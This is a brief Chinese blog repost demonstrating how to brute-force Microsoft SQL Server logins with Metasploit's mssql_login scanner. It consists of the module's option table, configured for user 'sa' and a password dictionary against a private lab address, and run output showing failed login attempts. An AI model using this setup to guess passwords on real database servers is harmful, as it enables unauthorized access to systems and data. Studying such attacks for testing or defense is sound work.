码迷,mamicode.com
首页 > 数据库 > 详细

MSF爆破MSSQL

时间:2018-04-13 23:27:43      阅读:816      评论:0      收藏:0      [点我收藏+]

标签:col   .com   lis   ORC   tput   lin   add   success   fas   

show options:

技术分享图片

 

msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   BLANK_PASSWORDS      false                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS         false                                     no        Add all users in the current database to the list
   PASSWORD                                                       no        A specific password to authenticate with
   PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line
   RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier
   RPORT                1433                                      yes       The target port (TCP)
   STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                                         yes       The number of concurrent threads
   USERNAME             sa                                        no        A specific username to authenticate as
   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false                                     no        Try the username as the password for all users
   USER_FILE                                                      no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true                                      yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > run 

[*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.
[!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:npdx123! (Incorrect: )

 

MSF爆破MSSQL

标签:col   .com   lis   ORC   tput   lin   add   success   fas   

原文地址:https://www.cnblogs.com/nul1/p/8824263.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!